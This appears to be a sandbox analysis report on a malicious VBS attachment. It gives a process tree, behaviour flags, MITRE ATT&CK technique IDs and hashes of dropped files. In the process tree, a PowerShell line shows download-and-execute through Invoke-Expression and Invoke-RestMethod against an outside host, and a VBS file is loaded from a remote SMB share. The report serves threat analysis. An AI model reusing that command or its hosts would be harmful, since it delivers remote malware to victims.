PID 1924 wrote to memory of 4312	1924	MicrosoftEdgeCP.exe	80
PID 1924 wrote to memory of 4312	1924	MicrosoftEdgeCP.exe	80
PID 1924 wrote to memory of 4312	1924	MicrosoftEdgeCP.exe	80
PID 1924 wrote to memory of 4312	1924	MicrosoftEdgeCP.exe	80
PID 1924 wrote to memory of 4312	1924	MicrosoftEdgeCP.exe	80
PID 1924 wrote to memory of 4312	1924	MicrosoftEdgeCP.exe	80
PID 1924 wrote to memory of 4312	1924	MicrosoftEdgeCP.exe	80
PID 1924 wrote to memory of 3564	1924	MicrosoftEdgeCP.exe	79
PID 1924 wrote to memory of 3564	1924	MicrosoftEdgeCP.exe	79
PID 1924 wrote to memory of 3564	1924	MicrosoftEdgeCP.exe	79
PID 1924 wrote to memory of 3564	1924	MicrosoftEdgeCP.exe	79
PID 1032 wrote to memory of 3336	1032	chrome.exe	90
PID 1032 wrote to memory of 3336	1032	chrome.exe	90
PID 1032 wrote to memory of 1332	1032	chrome.exe	92
PID 1032 wrote to memory of 1332	1032	chrome.exe	92
PID 1032 wrote to memory of 1332	1032	chrome.exe	92
PID 1032 wrote to memory of 1332	1032	chrome.exe	92
PID 1032 wrote to memory of 1332	1032	chrome.exe	92
PID 1032 wrote to memory of 1332	1032	chrome.exe	92
PID 1032 wrote to memory of 1332	1032	chrome.exe	92
PID 1032 wrote to memory of 1332	1032	chrome.exe	92
PID 1032 wrote to memory of 1332	1032	chrome.exe	92
PID 1032 wrote to memory of 1332	1032	chrome.exe	92
PID 1032 wrote to memory of 1332	1032	chrome.exe	92
PID 1032 wrote to memory of 1332	1032	chrome.exe	92

C:\Windows\system32\LaunchWinApp.exe
"C:\Windows\system32\LaunchWinApp.exe" "C:\Users\Admin\AppData\Local\Temp\ohmygoditsthefunkysh1t.html"
1⤵
PID:164

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:600

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:3812

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1924

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1800

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:3564

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:4312

C:\Windows\System32\PickerHost.exe
C:\Windows\System32\PickerHost.exe -Embedding
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3428

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:208

C:\Windows\System32\DataExchangeHost.exe
C:\Windows\System32\DataExchangeHost.exe -Embedding
1⤵
PID:1564

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:1388

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:864

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\ohmygoditsthefunkysh1t.html
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7fffb6399758,0x7fffb6399768,0x7fffb6399778
  2⤵
  PID:3336
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1520 --field-trial-handle=1824,i,707219911870312151,7014513561893279956,131072 /prefetch:2
  2⤵
  PID:1332
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1804 --field-trial-handle=1824,i,707219911870312151,7014513561893279956,131072 /prefetch:8
  2⤵
  PID:4856
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2100 --field-trial-handle=1824,i,707219911870312151,7014513561893279956,131072 /prefetch:8
  2⤵
  PID:4332
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2844 --field-trial-handle=1824,i,707219911870312151,7014513561893279956,131072 /prefetch:1
  2⤵
  PID:4184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2852 --field-trial-handle=1824,i,707219911870312151,7014513561893279956,131072 /prefetch:1
  2⤵
  PID:1880
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3848 --field-trial-handle=1824,i,707219911870312151,7014513561893279956,131072 /prefetch:1
  2⤵
  PID:2388
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4856 --field-trial-handle=1824,i,707219911870312151,7014513561893279956,131072 /prefetch:8
  2⤵
  PID:368
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5008 --field-trial-handle=1824,i,707219911870312151,7014513561893279956,131072 /prefetch:8
  2⤵
  PID:4252
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3032 --field-trial-handle=1824,i,707219911870312151,7014513561893279956,131072 /prefetch:8
  2⤵
  PID:4884
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=940 --field-trial-handle=1824,i,707219911870312151,7014513561893279956,131072 /prefetch:1
  2⤵
  PID:1344
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=2244 --field-trial-handle=1824,i,707219911870312151,7014513561893279956,131072 /prefetch:1
  2⤵
  PID:2568
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5508 --field-trial-handle=1824,i,707219911870312151,7014513561893279956,131072 /prefetch:1
  2⤵
  PID:4492
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4932 --field-trial-handle=1824,i,707219911870312151,7014513561893279956,131072 /prefetch:1
  2⤵
  PID:2356
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5268 --field-trial-handle=1824,i,707219911870312151,7014513561893279956,131072 /prefetch:1
  2⤵
  PID:1668
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=2232 --field-trial-handle=1824,i,707219911870312151,7014513561893279956,131072 /prefetch:1
  2⤵
  PID:864
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5280 --field-trial-handle=1824,i,707219911870312151,7014513561893279956,131072 /prefetch:1
  2⤵
  PID:5008
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1740 --field-trial-handle=1824,i,707219911870312151,7014513561893279956,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:512

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3036

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Report-26-2024.zip\Report-26-2024.vbs"
1⤵
PID:4824
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'withupdate.com/zuyagaoq')
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1976

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "\\170.130.55.130\share\a\Report-26-2024.vbs"
1⤵
PID:164

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Filesize
4KB

MD5
1bfe591a4fe3d91b03cdf26eaacd8f89

SHA1
719c37c320f518ac168c86723724891950911cea

SHA256
9cf94355051bf0f4a45724ca20d1cc02f76371b963ab7d1e38bd8997737b13d8

SHA512
02f88da4b610678c31664609bcfa9d61db8d0b0617649981af948f670f41a6207b4ec19fecce7385a24e0c609cbbf3f2b79a8acaf09a03c2c432cc4dce75e9db

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000003

Filesize
198KB

MD5
cda68ffa26095220a82ae0a7eaea5f57

SHA1
e892d887688790ddd8f0594607b539fc6baa9e40

SHA256
f9db7dd5930be2a5c8b4f545a361d51ed9c38e56bd3957650a3f8dbdf9c547fb

SHA512
84c8b0a4f78d8f3797dedf13e833280e6b968b7aeb2c5479211f1ff0b0ba8d3c12e8ab71a89ed128387818e05e335e8b9280a49f1dc775bd090a6114644aaf62

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
144B

MD5
f82d3322a65e85472cdf12efa10264f2

SHA1
10e46d3661616abcb03871dfa4dadc9eb6411fdd

SHA256
fb44fb7bb04aa4823fceab5232dcd27be19406bdaf7cd87f82798870ac22b15c

SHA512
1bdb888e5c41a85a417442c9acc68350fa53d84a847c7a2753da29e335cd82c96a119ccda8ea0f7efba58c844f628eac8cd7564e1ed147c1478dea8b7ad50e85

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
4741894469c379e26d4dd34ec4531cb4

SHA1
dc6be54a9219ee2acd066ac1576a3e16f50bf8d1

SHA256
d3c9e0649f58d5eb5d49d09b7b10bf4dd92e97a24e826930283d8eb4c9144ecf

SHA512
7ca31f5e17b4d9fe37f943947fda7185b2cdabd64870a084549e2235d85129d769d190047c615495ea010b6a5e6c048516a794c7f88448a3230897dc816ff6a1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
39f84d9add84b237a40c4d27f14047f5

SHA1
adfc058012932ece66ae3973380f5f87fe40db25

SHA256
9c2087a06a0f392107a86cf654caf93049ea1d2e3ec6b727b14d39f15a68b31a

SHA512
23965b45f847d0e7be98082ce25b85851adf46c4c3e1fab4fb3b8e162ecfc0ce29290ae42a71097106e4f0c7904d1fe8e56d43959d5960a9bcad7effd4c18fab

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
706B

MD5
6c182d55d64a7ccf9f7d58d526c76286

SHA1
4cc37250089e974f84ed9506f6e3cc4bfada5b17

SHA256
1d8ada995ad8a254ad915e5285089d88e735f59f3976efae686da469a65ed9f4

SHA512
88f654077f8fc5e10f9e52134ab6888db0fb8455e15fb7db7d85d5dc832d503afe90aaa8968b8650e950d9fda4b7931cc27b9b0d902af88ae83f8d54ae1df8bf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
706B

MD5
e066ba644424d65178725b6ca71d0ae8

SHA1
1e3d595362a938fe41b86545d3ed843a4f6a2152

SHA256
fc7f86c98080d554aa3e1bfb0776e67c18e2e1bb736f89529f03f08610476080

SHA512
53ce90703f2dce296eb1ecebcdaa97106ec58dcd8685152c4d9cdba382167e517ac6bb0a2f3284442ad09d6a78a60c0672c4e648b6109a64829ea50d79701072

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
706B

MD5
e2076df1c6da5f95027bf1bc42a33426

SHA1
50de035849739f3e0cfb3a42e15a35e1511e7a78

SHA256
384e25512de30f3094f7068e1080f4e3654fe1cdfae014768fbe487387e6f57c

SHA512
c238c2243f610768ca7dc89617a37094f14f2504d89b2e54e65e9fa876b3a8e6a6d72fe1b09d99a9f255b3cac70304149931c11945e9c2feb231c5453aa5b27f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
5402b0ca54bb4e10285a9611cfe6e4ba

SHA1
34e81c29ef8a31616be43fd78b6e8e278c0fa8bf

SHA256
047f11342a6638ac1b2183bdf5fa96f5f44435cd2ac59bfe64dc7b3899a053b4

SHA512
d44ac662686eac240911038a6e0f29fe818fd15fd4713c870a2743fb19457c0f1ba26abc7685509008e2a6160bb64b9ffd472b88ac95742080908c033625bfbb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
96223954f193b9783cb1c32bf8dc7958

SHA1
2bd79a64b972c90ee0b635d39d05466eaa577cc5

SHA256
4acba4449176839512c303ccd7bd6c90e6a9f804f477c9ccd09152c31c81e4a2

SHA512
5a27494cac461b636591c401ce7fbdba67d47077da93048449593e1060c1f1be733ed756441e71e8d720069f482327858fe652629421dd04803554d7159d00b0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
9a78180fc10c4491ae52ece1d5ff035a

SHA1
6b3b64c9cefbe4d3df4bcb7d25b2ebbb083e3327

SHA256
4023794470860810d876ded9c9a3f642b9b208c073f86409bff177674b75da59

SHA512
9ab02a13a1f3a521710b8157a8a7372707239cce476b6c62798f4767a0a56a6535c692d7a6ab82b51600995eb7e58aff6eb33a0a62b993612c15031a5ef6a6d2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
13efe9072236a2aa0a079254f9394cee

SHA1
2746fe60ffaa6e9b8ac5eaab9869562fa1611a19

SHA256
32db766e86fe8763e86ed3f786ffcd6dc307dbee6a2b0d029802d704268197c1

SHA512
ec8aa4ac901d5e40720c8584cd230001a13be6a13bcfae649718c33a12652c7d1681ab98e6fd50943611e97597ac4d705d30595c7e0609b9b503a1cd458aefe3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
ce6d98f4ffab196dbe0d65555c20eb1b

SHA1
0863fe9be924d813a6bf5ee8bfbd61cc6faf3ef1

SHA256
8e618adb65a7ff25e1553793c29c0e47c7ef01dcb284265c13dd5b0f5f68f385

SHA512
0282f4ee9cb6df8020623658ef28e7f865174b848ac6c6509e95f9cee84c8038450e7e9658fd1b7c3adab2d835e3bf22c12e41c3d74a461a498f2e7fe9c3a9b8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
42474a54faaf62c81aeb5dd0da4c3d8a

SHA1
73ed2a1d361412e95637c79a38a22163a2e252b3

SHA256
0f16a526e13a68f7ea934703224ff956c57e41d3f05aa7dc5f1b20640ac811ec

SHA512
791ac2a4984ca7a327ba5a478a0322cae33859471379ef3f2db14ffc206b552e4ef49dca3babbcd0142a27a3215b25f741fe9e64d2cac0285e089312fe9545d4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
21818879f4d5020691aad0f5b2334bff

SHA1
bf5acfd1b9335ea9f0e01264951221492cf87b16

SHA256
26f95b7a8b0857e1526e5a64af4a213327304ebe8ff82530dd36934d6f584043

SHA512
78b50d3b49f5efb48537a2b1e89f37178ecd33e8430230805f1b9b5f97b901d15960d44d69df456da118f81a59e1b3d039ca6726ab590609de53dfd29826aa14

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
8224de0499913ede0e132d751ce913d4

SHA1
ab49c5296bd0cf50873d8353cf8f1152e8138e49

SHA256
a83df86237a3e9b9909644bd27b45ed772826a42e6127e1185545409911a399e

SHA512
5249b8d4237aed2a0fee3445cd59d008ad70a4789635344f3761d1cb33013f038313d750cf5ab33089d916586421fef9629cab7b31be5fba0c8eff45dddf4b1b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
d47f90db3f97d23996a7ed91a4dac9f5

SHA1
5dd8bd67bcb82bb24c753d4f2e84562e43462f88

SHA256
316f40cf896822aa7b765567951595457ccc26135023e5bebe1f6dbedcee5660

SHA512
9068696139ae3d1c52679e80dafc0dc65216272193b4a7016186a889a812b0c7ddc0a112412f25801db2437c6de81a3d0831f82dcad2c81ae214d5e157bf1a47

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
260KB

MD5
e46a45532b80cad201371f29e09132e9

SHA1
34e3a9d084d360804234df30369c8cf012a19810

SHA256
28be0a374ead8cf77f81a1a31059f19122ebc6f8abc88b97913738b4e773e014

SHA512
f6de820f6d9c6c71b785e98b49db18ce78ebe7b33ba8640667b82f9bcba977db164187111d9c21dcbf3114f4915d6b1c5aa197547cdde94743b1e86e619fc0f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
260KB

MD5
f7e242c001b0e044ff7cb9a1210923b9

SHA1
664277873a9ada556265fb920dc1ecd06be22fe9

SHA256
622c7c0ca503ee76025e3210b826bfe827c2e109d5eb08d2697ec76875b200bd

SHA512
1993a33b8b4c59ec6c993326495d2c8f8e24196feaf7d4c7646ae6890b93387db5253da5a132d10d18a1d8161ccade3639c11d1ee4f57156935e70db085c412d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
260KB

MD5
adaf85a6bb271c1e64344f8fdc40d145

SHA1
40c235363edbc3535179820946f7fcd335b44f08

SHA256
ab0c6f121048baf41191b7d49708ec3c8247a0cb92fd8e0a273470f713af4543

SHA512
461d16bd0925c30d1d0f4df99abd678010c85037f8fcdf08fb0c9e1d8191d58cc6d83fad1457c07a7c5fe5f9e6241effe5535aececc58751c60b2f06fd226258

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\FJZ9UFDF\edgecompatviewlist[1].xml

Filesize
74KB

MD5
d4fc49dc14f63895d997fa4940f24378

SHA1
3efb1437a7c5e46034147cbbc8db017c69d02c31

SHA256
853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1

SHA512
cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\2CTK1T1M\googleapis.proxy[1].js

Filesize
14KB

MD5
f90f81101a83cb4d734364d4821a1ca8

SHA1
1e6cf9ddcc03f265155e0a88ade643d9bfc3bb69

SHA256
34703f02823bc5a92329086b1957979116a8a0172711ed2550c4691857a4019c

SHA512
24630203579f159ef5f8741010d6c30b0de4d267890f184cb2a4e6e55b4e625a5dc81a97d5ae11b9a8c8fdf93105dcf75cbd45d19315d84573fa8a72ab684911

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\GAYO4K14\cb=gapi[2].js

Filesize
76KB

MD5
c33274557c7019372daf65d62bede0d4

SHA1
d4642405efdce1344e98d6890113a1cdf92760a3

SHA256
748653b2a83fb6e79f7cf4217de88626de140eb70a06ae1a7efd295a510ab339

SHA512
132ec32ae9bbe815bfb26e787acd00676003406fe40bb50d6d972573c72388ed677fcf5dea0809d33dbe9b712f4685fbcfb89e5db8d01c1bde31397054c09136

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661

Filesize
471B

MD5
5582cec5cb2111536bd52069bc2cf95f

SHA1
09f3eca0641553bfd0635850e43b2775132e5cc7

SHA256
2459577dcb1d4ffdcc6df6dffa5ae716623230c07a7181914124321cd9dbfef1

SHA512
ce4090b1b858032d4f9375a57c0a8441eb44dfd62a0902b695327e86536c04396e5073fa24981cecf01f7c54bbfbeb79e011ae634d0591ab86add6a96afeb5a5

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661

Filesize
410B

MD5
5fd50578c89bc28696c810fd8b7a42c4

SHA1
8df715d575ffc9d9c3e75045efac0cb2a5b81dc4

SHA256
0724327acd77909ec3837f032307fb669d7fe898a202122062e3e956a515d5a1

SHA512
8086098626edd77cb448fe6b3d44bb6c09bb020782cdf9a2a26f68054035d814cb79bb2ded4463ae2679f9e3d26078bb98ef135faad0fa4d43df796a117f13f6

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\002LSFS8\icon_48px[1].png

Filesize
1KB

MD5
75d78a3233b5e0672f48247200decdb0

SHA1
da7e8b9db98a6950d1637b4dd5e098fa2ec3a02a

SHA256
e136ae509e08ac00fb264cb82cfa1081982ddcf775ee058b201fabbcc59b7c8a

SHA512
78101831843340d55a22de928677fcdbc20a66fabb7cf8bc9961ee7ad334286e0c2ff3a10b09785bd84854ed511c6931a2a7cd0e0810c18adf526ef3619697f0

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\75985S9X\suggestions[1].en-US

Filesize
17KB

MD5
5a34cb996293fde2cb7a4ac89587393a

SHA1
3c96c993500690d1a77873cd62bc639b3a10653f

SHA256
c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

SHA512
